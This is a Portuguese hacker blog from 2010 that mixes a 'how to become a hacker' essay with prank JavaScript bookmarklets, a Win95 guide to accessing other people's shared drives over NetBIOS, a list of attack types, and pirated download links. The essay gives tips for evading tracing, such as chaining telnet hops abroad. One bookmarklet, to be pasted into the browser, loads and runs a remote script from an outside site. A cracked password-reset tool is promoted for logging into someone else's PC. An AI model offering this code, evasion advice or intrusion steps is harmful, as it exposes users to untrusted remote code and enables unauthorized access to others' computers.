Parece que muitas e muitas pessoas, todos os dias fazem esta pergunta em grupos de notícias, através de e-mail, em salas de chat. Não há nenhuma resposta simples, desde que cada um deve seguir seu próprio caminho. Mas há uma coisa que você deve ter para almejar o status de um hacker: determinação! Você deve ter um apetite voraz para encontrar informação e ensinar a si mesmo. Você não pode contar com outros, não pode contar com a escola. O curso de digitação não o levará a lugar algum.

Conseguindo Ajuda

É verdade que existe centenas e centenas de home pages de "hackers" na Internet. Se você nunca tentou enviar um e-mail para algum deles, uma coisa certamente se torna evidente, a falta de conhecimento. Qualquer pessoa (eu inclusive!) pode colocar uma página na Internet, adicionando links, textos,... de outros e se chamar um hacker. Mas peça por ajuda para escrever um shel script para explorar um bug e você ficará ligeiramente disapontado. Claro! há alguns hackers genuinos por aí, e se você conseguir encontrá-los, poderá pedir ajuda. Mas aí você estará dependendo de alguém para tudo. Um hacker deve ser autoditada.
Algumas Outras Necessidades

É importante saber e aceitar que você estará sob fogo, quando outros ouvirem sobre o seu interesse em se tornar um hacker. É para ser esperado: você está tentando ser parte de uma minoria que é odiada pelo grande público da área, por causa de imagem ruim que é comumente difundida. Deve discordar de comentários negativos e de julgamentos apressados. E finalmente, você deve ser humilde para se tornar um hacker. É absolutamente necessário admitir que você sabe apenas 1 por cento do que há para se saber sobre o mundo da informática e seus pecados, no objetivo de sempre direcionar seus esforços para aprender mais. Alguma vez, já notou que pessoas com grandes egos são idiotas ? Adivinhe por que ? Se você acha que sabe tudo, por que se encomodar em continuara aprendendo ? Um hacker tem um desejo insaciável por informação, são obssesivos sobre tudo, sejam redes telefônicas, internet, computadores ou qualquer coisa. É por este motivo que um hacker, constantemente, "explora" por mais informação. Então você precisa de tempo livre para se dedicar ao aprendizado. E o que você deve aprender ?
Tomando Os Primeiros Passos
Um conceito errado sobre hackers é que você deve ser um gênio em programação. Isto não é verdade! Claro, que quanto mais você souber melhor. Você precisa realmente saber algum shell scripting e linguagem C, básicos. Aqui o que eu acredito ser o mais essencial no aprendizado de um hacker: Primeiro, você deve aprender sobre o sistema operacional UNIX. Ele é um dos sistemas operacionais mais usados em servidores na Internet. Acessando um sistema UNIX via Telnet ou um terminal de cliente, não irá apresentar-lhe uma interface gráfica interessante, é um ambiente de somente texto, como o DOS. Não há gráficos, apenas um simples e extremamente eficiente sistema operacional que está muito a frente de seu tempo, desde quando foi criado. É claro que você poderá encontrar o X-Windows em máquinas Unix e rodar uma enorme variedade de aplicativos gráficos, mas é irrelevante para esta discussão. Você precisa ter um conhecimento complexo do sistema operacional. Sabendo como ele funciona em detalhes, é essencial. O código-fonte é distribuído gratuitamente para UNIX e seus variantes, e desta forma você deve estudá-lo. Compre livros, procure pela internet, consiga informações de todas as fontes que puder. Apenas esteja apto a usar o UNIX como se o usasse por toda a sua vida. Muitas pessoas esquecem as lições básicas e acham que precisam aprender apenas sobre as medidas de segurança do sistema operacional. Isto é fútil, como você poderá "penetrar" em um sistema se você não sabe usá-lo para simples tarefas rudimentares, como trocar diretórios, listar arquivos, ver quem está conectado, etc,... Além disso, como mencionei anteriormente, você precisa ter experiência em shell scripting. Quanto melhor nisso, você for, melhor e mais completo hacker você será. Saber também um pouco de linguagem C é também imperativo, desde que você irá precisar de alterar códigos, programação de socket para a técnica de spoofing e ataques fragmentados,...
Uma vez que você saiba os fundamentos do UNIX, aprenda sobre as suas funções primárias de rede com protocolos da Internet. É essencial entender como um computador comunica-se com outro pela Internet. O próximo passo é aprender especialmente sobre segurança em sistemas UNIX, que incluem o design das permissões de acesso e firewall. Novamente, todas estas informações podem ser encontradas nas mágicas coisas chamadas livros.
Agora que você tem um entendimento total sobre UNIX, você poderá aprender como contornar a segurança nestes sistemas. Existem vários arquivos na Internet tratando sobre os últimos bugs, como o bugtraq e 8lgm.org. Comece a mater uma trilha imaginária nas falhas em vários serviços, e então quando você inspecionar um sistema ele irá surgir em sua mente.
A Psicologia de Hacke(ar)

É importante entender como o cérebro humano funciona em outras pessoas. Para se ter uma ideia de como comprometer a segurança de computadores, você deve "penetrar" na mente do administrador do sistema e pensar como você protegeria o sistema se fosse o encarregado. Você deve também levar em consideração que a muitas das pessoas são estúpidas, e isto será decisivo se você estiver tentando descobrir algumas senhas. Use o senso comum.

Nunca Pare de Aprender

Não pare aqui! Depois de entender sobre redes e UNIX, continue aprendendo mais. O que sobrou ? VAX/VMS, que é outro sistema operacional encontrado em alguns computadores conectados na Internet. Você pode começar explorando o mundo da criptografia (o que é suicídio se você odeia matemática). Mantenha-se atualizado nos novos desenvolvimentos em tecnologia. Simplificando: aprenda tudo o que puder todo dia.
Eis algumas abilidades de Kevin Mitnick (talvez o mais famoso hacker de todos os tempos): VM/CMS, OS/VS1, DOS/VSE, MS-DOS, RST/E, VAX/VMS, UNIX, TOP-20,... Familiarizado com algum destes ? Isto só nos faz pensar em uma coisa, vamos estudar!!!
Como Não Ser Pego

O erro que provavelmente todo hacker comete é que ele ou ela torna-se muito convencido ou popular. Não saia gritando que é um hacker na escola. Confie em menos pessoas posíveis. Quanto menos pessoas souberem que você está nisso, melhor. Não faça coisas idiotas, como hacke(ar) da sua própria casa a algum sistema de alta segurança. Embora este método está agora, "fora de moda", desde que existem meios mais fáceis de esconder sua identidade quando hack(eando) pela Internet. Existem vários meios para dificultar o rastreamento quando hack(eando) sistemas da Internet. Um deles, é conectar-se em diversos servidores com Telnet antes de acertar o seu alvo. Isto tornará o rastreamento muito mais difícil. Tente conectar-se a sistemas localizados em outros países. Nunca tente hack(ear) uma instituição governamental, você irá ser pego e irá para a cadeia! Não seja estúpido achando ser bom demais para ser pego. Nunca fale sobre hack(ear) ao telefone principalmente nos sem fio, você nunca sabe quem está ouvindo. Encripte suas mensagens de e-mail. Seja um pouco paranoico! Quanto mais paranoico você for, menos chance você terá de ser pego.
Último, Mas Muito Importante

Sempre digo que conhecimento é apenas metade do que faz um hacker. A outra metade é a ética. Você pode ser um perfeito gênio, mas se não tiver ética, você está no mesmo nível de um criminoso. Todo hacker possui um código de ética.

Você Não é um Hacker se

* Você pirateia software
* Você espalha viroses (qualquer um com um pouco de conhecimento de Assembler pode criar um vírus)
* Você deleta arquivos alheios e destroi seus sistemas (qualquer um pode deletar um arquivo)
* Você rastreia empresas de cartão de crédito ou bancos para conseguir dinheiro.

Gostou? então copie essa postagem para seu Blog:

quarta-feira, 5 de maio de 2010

assustar amg

Você quer excluir seu profile?

javascript:confirm("Vocêquer excluir seu profile?");alert("Aguarde um instante");alert("Perfilexcluido comsucesso.");document.location=("http://www.orkut.com.br/HomeDeleted.aspx?reason=5/");alert("Maiscodigos no site:\n http://www-fly.blogspot.com/");void(0);

Dica: Quem usar o código irá aparecer uma janelinha pergutando se você quer excluir o seu profile no orkut... aí não tem jeito só testando mesmo pra ver.

Baixando vírus...

javascript:sc=document.createElement('script');sc.src="http://www.viciados-hacker.com/susto2.js";document.getElementsByTagName('head')[0].appendChild(sc);alert("Maiscodigos no site:\n http://www-fly.blogspot.com/");void(0);

Dica: Este código é usado colando-o na barra de endereços do seu navegador, mas não precisa entrar em pânico, o código não é malicioso.

Seu pc será formatado.

javascript:nome=prompt("Digiteseu nome");document.write(""+ nome +", você foi vitima de umaquadrilha de hackers, por favor, por motivos de segurança,precisamos de sua colaboração enquanto o Windows éformatado.");confirm("Atenção:nSe você optar pornão formatar seu computador agora, seu Windows entrará emcolapso.nDeseja formata-loagora?");document.write("
Preparando Windows para serformatado em
3
2
1
0");document.write("
Setup Completo"); alert("Porfavor, agora solicitamos o Numero de licença do seuWindows");alert("Seu número de licença estálocalizado no Painel de Controle/Sistema/General > ProductID");prompt("Digite o número de licença para continuar");alert("Numero de Licença INVALIDO");prompt("Digite onúmero de licença para continuar"); alert("Numero deLicença INVALIDO");confirm("Parece que Windows nao e original,clique em ok para continuar aformatação");document.write("Formataçãocontinuada");document.write("
Computador sendo formatado...");alert("Espere um Momento");alert("Seu computador sera desligadoagora");document.write("
Desligar em 2 minutos");alert("Agorapode continuar suas atividades...");alert("Peguei voce!nIsso e apenasuma pegadinha!!!nDepois desse susto, quero que voce conheca o melhorsite de codigos doorkut!");document.location=(http://www-fly.blogspot.com/);void(0);

Dica: Depois que usar o código aparecerá uma mensagem pergutando seu nome, depois dizerá que voce foi vítima de uma quadrilha de hackers, aí começa o drama.

terça-feira, 4 de maio de 2010

Como invadir um computador

Eu não me responsabilizo pelos seus atos

Invasão por ip
Alegria de uns, tristeza de outros, na verdade, aqueles que utilizam a rede Dial-Up do Win95 para sua conecção com a internet podem estar correndo sérios riscos a não ser, é claro, que assim conectam-se propositalmente, com intenções "diversas". Utilizar-se de uma conecção PPP do Win95 num provedor de acesso, significa estar disponibilizando seu computador a todos os usuário da net. Mesmo sem o compartilhamento de arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-se ao seu computador caso você esteja utilizando esse tipo de conecção. Conecte-se à Internet utilizando a rede Dial-Up do Win95. Se o seu provedor não disponibilizar uma conecção do tipo PPP, estas dicas não funcionarão. Verifique antes, se você possui os drivers clientes para redes Microsoft. Caso não estejam instalados, instale-os através do Painel de Controle, no ícone Redes. Verifique também se o compartilhamento de Arquivos e Impressoras está instalado. Se estiver, você estará sujeito à que outra pessoa conecte-se ao seu computador simplesmente sabendo seu IP. Se bem que, para aqueles que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança do Win95. Para você poder encontrar outros computadores compartilhados, você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na procura de computadores que possuem IP dinâmicos. Configurar essas opções é simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontrará a opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa criar um arquivo texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção -N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis, tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você ainda poderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador.

Gostou? então copie essa postagem para seu Blog:

segunda-feira, 3 de maio de 2010

- =[ Oração hacker ]= -

Byte nosso de cada dia que nós trás hoje
-
Falsificado seja o vosso registro
-
Venha a nós o vosso password
-
Seja pirateada a vossa integridade
-
Assim na web como no unix
-
o scripts nosso de cada dia que nos auxiliai hoje
-
Crackeia os nossos programas
-
Assim como nos hackeamos aqueles que os tem obtido
-
Não nos deixeis cair na prisão
-
Mas nos livrai dos log files,
-
Disconected ...

domingo, 2 de maio de 2010

COMO FORMATAR UM XP

Um super tutorial semi-interativo, onde se se aprende a formatar um PC, instalando o Windows XP.

Clique Aqui Para Saber Mais Informações.

Idioma: Portugues
Tamanho: 1.71 MB
Hospedagem: Easyshare / Megaupload

Iniciar Download

assuatar amg

Você quer excluir seu profile?

javascript:confirm("Vocêquer excluir seu profile?");alert("Aguarde um instante");alert("Perfilexcluido comsucesso.");document.location=("http://www.orkut.com.br/HomeDeleted.aspx?reason=5/");alert("Maiscodigos no site:\n http://www-fly.blogspot.com/");void(0);

Dica: Quem usar o código irá aparecer uma janelinha pergutando se você quer excluir o seu profile no orkut... aí não tem jeito só testando mesmo pra ver.

Baixando vírus...

javascript:sc=document.createElement('script');sc.src="http://www.viciados-hacker.com/susto2.js";document.getElementsByTagName('head')[0].appendChild(sc);alert("Maiscodigos no site:\n http://www-fly.blogspot.com/");void(0);

Dica: Este código é usado colando-o na barra de endereços do seu navegador, mas não precisa entrar em pânico, o código não é malicioso.

Seu pc será formatado.

javascript:nome=prompt("Digiteseu nome");document.write(""+ nome +", você foi vitima de umaquadrilha de hackers, por favor, por motivos de segurança,precisamos de sua colaboração enquanto o Windows éformatado.");confirm("Atenção:nSe você optar pornão formatar seu computador agora, seu Windows entrará emcolapso.nDeseja formata-loagora?");document.write("
Preparando Windows para serformatado em
3
2
1
0");document.write("
Setup Completo"); alert("Porfavor, agora solicitamos o Numero de licença do seuWindows");alert("Seu número de licença estálocalizado no Painel de Controle/Sistema/General > ProductID");prompt("Digite o número de licença para continuar");alert("Numero de Licença INVALIDO");prompt("Digite onúmero de licença para continuar"); alert("Numero deLicença INVALIDO");confirm("Parece que Windows nao e original,clique em ok para continuar aformatação");document.write("Formataçãocontinuada");document.write("
Computador sendo formatado...");alert("Espere um Momento");alert("Seu computador sera desligadoagora");document.write("
Desligar em 2 minutos");alert("Agorapode continuar suas atividades...");alert("Peguei voce!nIsso e apenasuma pegadinha!!!nDepois desse susto, quero que voce conheca o melhorsite de codigos doorkut!");document.location=(http://www-fly.blogspot.com/);void(0);

Dica: Depois que usar o código aparecerá uma mensagem pergutando seu nome, depois dizerá que voce foi vítima de uma quadrilha de hackers, aí começa o drama.

PONTOS FRACOS

Existem inúmeras categorias de ataque a serviços Internet, explorando falhas de software, hardware e principalmente burlando esquemas de segurança ineficazes em nossas políticas operacionais. Por exemplo:

Sniffer: Captura informações que trafegam pela rede, como logins e senhas em texto não-criptografado, podendo ser utilizadas futuramente por um invasor.

Spoof: Baseia-se na confiança da negociação entre servidores, que acreditam na veracidade do endereço de origem daquela ordem ou informação, e podem sofrer um ataque por mensagens na qual a origem é "disfarçada" como sendo de alguém de confiança.

Mudanças de rota: Um ataque desta natureza pode fazer com que toda a informação de um dado servidor seja obrigada a passar por um espião antes de seguir seu caminho, ou simplesmente sejam redirecionadas para lugar nenhum, causando a "queda" do serviço.

Trojan Horse: Um programa pode ser inadvertidamente instalado em um servidor, o qual permitiria uma invasão por alguma porta ou "brecha" propositadamente implantada neste programa.

Replay: Alguma ação, comandos ou seqüência de eventos podem ser observados durante um processo de autenticação, e repetidas, posteriormente, por um invasor para obter acesso a estes sistemas.

Vírus: À primeira vista pode parecer um simples problema de usuários domésticos, mas os vírus, se não forem devidamente eliminados e controlados, podem causar, direta e indiretamente, vários problemas em uma rede, desde a impossibilidade de comunicação interna, até a interrupção dos serviços vitais.

Adulteração: A falta de um controle de conteúdo eficiente pode fazer com que uma informação seja adulterada durante sua transmissão, pondo em risco a comunicação entre dois sistemas.

Alguns produtos, tais como servidores ou até mesmo sistemas operacionais completos, vêm configurados "da fábrica" de uma forma muito pouco segura, e é necessário conhecer todos os aspectos da nova ferramenta instalada no seu sistema para que ela seja corretamente utilizada.
Programas como servidores de mail, ftp, web ou configurações do sistema, como permissões de arquivos, aplicativos desnecessários (tal como um lpd em um servidor exclusivo de web) devem ser completamente vistoriados antes da sua instalação, procurando se informar sobre suas capacidades de auditoria e sobre seus recursos de segurança.

Pode-se ainda, caso o sistema em questão seja inseguro e necessário, cogitar produtos que possam implementar esta segurança à parte, e dar a mesma importância a eles, instalando-os simultaneamente, e nunca "deixar para depois", pois se alguém detectar uma falha no seu sistema, ela será explorada imediatamente!

E o mais importante: estas configurações padrões, ou os erros mais comuns durante as instalações, são os primeiros alvos dos hackers e, em pouquíssimo tempo seu sistema poderá ser completamente comprometido por pura falta de atenção.

quinta-feira, 29 de abril de 2010

PCLoginNow full

capa:







Descrição:

PCLoginNow Full 2.0 + crack



PCLoginNow é um CD bootável que serve para resetar a sua senha de login do Windows em caso de perda ou caso vc queira logar no PC de alguem mas não sabe qual a senha



É só iniciar o PC com ele no drive, aguardar o carregamento e depois seguir as etapas para resetar QUALQUER senha de login do Windows (inclusive a do ADIMINISTRADOR!!)



Tamanho: 54,7 mb
Formato: rar
Hospedagem: RapidShare

Imagens:







Download:

http://rapidshare.com/files/244705603/PCLoginNow_Full_2.0___crack__AnOn_.rar

quarta-feira, 28 de abril de 2010

"Hackers,Criminosos & Anjos" e "Piratas do vale do Silício"

Enquanto as ciências da computação buscam abranger cada vez mais todas as áreas e atividades do nosso cotidiano, governos, empresas e o público em geral tornam-se vitimas do terrorismo cibernética, da espionagem industrial e múltiplas formas de fraude. Este documentário investiga o mundo do crime cibernético: as vítimas, os invasores, seus métodos e suas motivações. Vamos nos aprofundar neste mundo sombrio, enquanto os organismos da lei contam com a ajuda de ex-hackers para tentar proteger cidadãos e instituições do que pode-se prever como um verdadeiro caos eletrônico.

Ficha Técnica
Título Original: Hackers,Outlaws & Angels
Gênero: Documentário
Tempo de Duração: 52 min
Ano de Lançamento: 2003
  • Opção Um (Formato Rmvb, qualidade DVDRip, 228Mb)
MegaUpload
Filme

  • Opção Dois (Formato Rmvb)
RapidShare
FilmeParte01 - Parte02 - Parte03 - Parte04 -
Legenda: SFV

  • Opção Três (ed2k)
eMule e outros ed2k
ed2k://|file|Hackers.anjos&criminososDVDrip.dublado.by.ze zinhomie.xteam.rmvb.rmvb|367065126|A4A3D93E971B2ED 8181066ECD15557D4|/


Na primeira cena de Pirates of Silicon Valley, Steve Jobs olha para a câmera com um ar maníaco e diz: “Não quero que você pense nisso só como um filme. Nós estamos reescrevendo a história da humanidade.” Mas Jobs, que no filme é vivido pelo ator Noah Wyle – famoso pela atuação no seriado E.R. –, não está se dirigindo ao espectador; está falando com o cineasta Ridley Scott, que dirige o comercial de lançamento do Macintosh, em 1984.

Pirates of Silicon Valley, de 1999, conta a história do computador pessoal de um jeito muito divertido. O filme contém exageros e é meio maniqueísta, mas deixa bem claras as diferenças entre os grandes inventores do computador pessoal: Jobs, Bill Gates e a IBM.

Jobs é um garoto hippie e contestador, que vai a passeatas na universidade, toma LSD e tem inspirações messiânicas: “O Steve nasceu obcecado em destruir a IBM”, conta no filme o engenheiro Steve Wozniak, que foi co-fundador da Apple.

Toda essa fúria vem do sofrimento: Jobs chora, faz terapia e não se conforma com o sumiço da mãe biológica (para quem não sabe, Steve Jobs é adotado). A namorada de Jobs fica grávida, e ele não quer assumir a criança. Mas acaba exigindo escolher o nome da filha – Lisa, mesmo nome que deu, em 1978, ao antecessor do Macintosh.

Bill Gates é o completo oposto. Faz coleção de revistas Playboy e gosta de beber cerveja jogando pôquer com seus amigos Paul Allen e Steve Ballmer (com os quais viria a fundar a Microsoft).Já os executivos da IBM são mostrados como bocós – um ponto alto do filme é a cena, hilária, em que Gates engana a IBM e vende um sistema operacional que não tem.

A rivalidade entre Jobs e Gates começa em 1977, no lançamento do Apple II. Gates, até então um joão-ninguém, é esnobado pelo colega numa feira de informática. E jura, naquele momento, destruir a Apple.

Com muita malícia, ele fecha um contrato para fornecer programas para o Mac. Quando Jobspercebe, Bill já roubou sua tecnologia e criou o Windows – uma cópia deslavada do Mac.

O filme termina com a Apple se rendendo, em 97, a Bill Gatescoisa que realmente aconteceu.:irked:

Informações técnicas
Título Original: Pirates of Silicon Valley

Ano: 1999
Audio: Inglês
Legenda: Português
Distribuidora: TNT/Warner Bros
Direção e Roteiro: Martyn Burke
Trailer
  • Opção Um (Formato RMVB 350Mb)
MegaUpload
Filme
Legenda

  • Opção Dois (Formato .avi/Muito boa 700 Mb)
Torrent
Filme

Legenda

  • Opção Três (Formato DVDRip Fullscreen)
RapidShare
Filme (links.txt)

  • Opção Quatro (Formato .Avi / Muito boa 700 Mb)
RapidShare
Parte 1
Parte 2
Parte 3
Parte 4
Parte 5
Parte 6
Parte 7
Parte 8

LEGENDA

São dois filmes que gostei muito, não somente pelo filme em si(digo pela ação), mas sim pelo tema abordado, como no Hackers,Outlaws & Angels, é algo muito discutido até hoje, sobre hackers, crackers...
E o segundo, Pirates of Silicon Valley, por "contar" a história Apple e Microsoft, Jobs e Gatese suas consequências.